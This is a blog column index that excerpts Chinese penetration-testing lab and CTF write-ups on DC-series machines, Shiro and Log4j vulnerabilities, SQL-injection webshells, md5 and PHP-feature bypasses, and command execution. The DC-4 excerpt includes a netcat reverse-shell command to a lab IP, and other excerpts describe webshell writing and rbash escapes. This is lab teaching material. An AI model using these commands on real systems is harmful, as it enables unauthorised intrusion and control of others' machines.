WEB
文章平均质量分 79
摘星怪sec
时光荏苒,流年似水
展开
-
靶机DC-4
nc -e /bin/bash 192.168.56.128 8086(nc+-e+/bin/bash+192.168.56.128+8086)空格用+号代替,也可以直接进行url编码。小结:用到的用户也就是jim和charles,要是前者能提权就省事了,不过靶机都是有提示,都是最后要提权,估计后面的靶机提权也不重样。去邮箱看到:/var/spool/mail 这里是前面提到的三个用户的:charles,以及给了密码:^xHhA&hvim0y。查看mbox的内容,看到有邮箱提示:来自root用户的信。原创 2024-07-17 00:21:24 · 347 阅读 · 0 评论 -
靶机DC-2
唯一有用的就只有vi(编辑器)这个命令,这里可以里用vi或者是BASH_CMDS设置shell来绕过rbash,然后再设置环境变量添加命令。已经升级为bash了,无法执行cat命令是因为环境变量的问题,用以下命令添加一下两条路径即可。后台登录地址,弱密码没爆破出来,结合上面的用 cewl生成字典。提示我们得su一下jerry,su是Linux切换用户的命令。得到flag4,提示git,还有root看来是要提权的操作。发现git能使用root的权限,这里有两种提权的姿势。爆破出了jerry和tom的密码。原创 2024-07-13 17:06:11 · 808 阅读 · 0 评论 -
靶机DC-1
如果是虚拟机打开报错,可以尝试一下更改。原创 2024-07-12 20:37:06 · 743 阅读 · 0 评论 -
红日(一)
拓扑图win7需要配置两张网卡,模拟内外网环境,充当跳板机外网网段:56内网网段:72目标拿下域控,2008,72.131,已经72.132。原创 2024-07-12 15:52:12 · 911 阅读 · 1 评论 -
靶机DC-3
搭建可能出现的情况:第一次导入镜像失败,可以再次尝试若出现报错的情况,都能搜到攻略,在设置里边更改即可以上情况博主都遇到了,不过都能搜到攻略。原创 2024-07-09 21:13:53 · 354 阅读 · 0 评论 -
Apache Shiro
CVE-2020-1957漏洞利用了Apache Shiro和Spring Boot对URL处理的差异性,攻击者可以构造特定的URL,绕过Shiro对Spring Boot中Servlet的权限控制,实现未授权的越权访问。Apache Log4j2的某些版本中,攻击者可通过JNDI注入执行远程代码。这通常涉及到恶意的日志消息,允许攻击者访问服务器上的资源。,将其忽略或错误处理为/admin/,Shiro的路径检查就会失效,允许未经授权的访问。-c是执行的bash命令,-A是指JNDI服务器IP。原创 2024-06-21 17:07:18 · 271 阅读 · 0 评论 -
sql注入getshell
条件:web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,写入“原创 2024-04-17 22:57:03 · 473 阅读 · 1 评论 -
AWD模拟搭建
搭建Cardinal平台平台搭建环境:KaliDockermysqlCardina根据自己的操作系统选择,这里我的是第四个。原创 2023-05-12 18:06:41 · 782 阅读 · 0 评论 -
web-php特性
Web89正则匹配,类型转换源码intval()函数用于获取变量的整数值这里主要是这个函数num))用正则表达式匹配输入值num,如果存在数字,则返回错误信息"no no no!并终止程序。这个函数是类型转换,也就是转为整形类型转换请移步因此num满足以上即可输出flag.phpnum[]=1。原创 2023-05-10 13:30:46 · 171 阅读 · 0 评论 -
web-文件包含
web78file看到include,就想到了伪协议。原创 2023-04-30 21:22:52 · 104 阅读 · 0 评论 -
web-命令执行
web29system执行;通配符题目:命令执行,需要严格的过滤这里对flag进行过滤,用通配符?flag绕过可以用 f*以下参考然后访问1.txt 就ok了web30把system过滤了?是一个PHP命令执行代码,它会在服务器上执行ls命令具体来说,exec()是PHP中用于执行系统命令的函数,它可以在参数中指定要执行的命令,而echo则将exec()函数返回的命令输出到页面上。因此,该代码相当于执行了ls,也就是达到了29。原创 2023-04-30 17:36:12 · 236 阅读 · 0 评论 -
web-信息收集
在计算机网络中,探针通常用于确保网络设备能够正常工作,并且记录网络的性能和瓶颈。例如,管理员可以使用 ICMP 探针测试网络设备的连通性,HTTP 探针测试 Web 服务器的可用性,或 SNMP 探针监测路由器或交换机的状态等。在计算机网络中,探针通常用于确保网络设备能够正常工作,并且记录网络的性能和瓶颈。例如,管理员可以使用 ICMP 探针测试网络设备的连通性,HTTP 探针测试 Web 服务器的可用性,或 SNMP 探针监测路由器或交换机的状态等。那就用抓包试试,用户有了,密码试试字符串,so?原创 2023-04-30 13:21:07 · 138 阅读 · 0 评论 -
web-md5绕过
具体来说,代码首先将�1和v1和v2分别存储为变量,然后通过isset()函数检查它们是否都存在。经过MySQL编码后会变成'or'6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。中使用了md5()函数加密, 我们可以利用MD5加密漏洞来绕过。没有对用户输入的密码长度进行验证,仅仅判断了长度是否大于。通过is_numeric()函数检查$v2是否为数字。通过md5()函数将�1和v1和v2哈希值相互比较。如果所有这些验证都通过,则输出$flag变量的值。的万能密码,来绕过登录呢。原创 2023-04-27 17:27:17 · 259 阅读 · 0 评论 -
WEB-PUT练习
可以看出,第三个路由是一个秘密路由,只有当请求方法为 PUT 并且路径为 "/super-secret-route-nobody-will-guess" 时才能访问。这可能是一个漏洞,因为未对该路由进行身份验证或授权检查,攻击者可以通过篡改 HTTP 请求来绕过安全控制,获取敏感信息或执行恶意操作。路由:使用 PUT 方法打开名为 "flag" 的文件并将其中的内容返回给客户端。用bp抓包,改一下请求方式,然后改文件路径在发包,就返回falg了。方法可以用于上传或更新文件,也可以用于创建新的资源。原创 2023-04-25 15:52:21 · 201 阅读 · 0 评论 -
WEB-NSS练习
这是个陷阱,flag不对,再找找,发现在html的目录下面还存在.git的文件,将文件翻一翻找一找,发现了一个phpinfo的文件,怀疑flag存放在phpinfo中,利用刚才上传的shell,输出一下phpinfo页面就好了。没错开头就是文件上传,web的题还有正儿八经的文件上传,习惯用bp抓一手。且等会上传的时候,传一个名字为flag.jpg的一句mm就行了。这道题就是那个文件上传靶场上面的第四关,我说怎么那么熟悉。先创建一个.htaccess的文件。文件上传,抓包,该后缀,上传即可。原创 2023-04-25 15:42:22 · 52 阅读 · 0 评论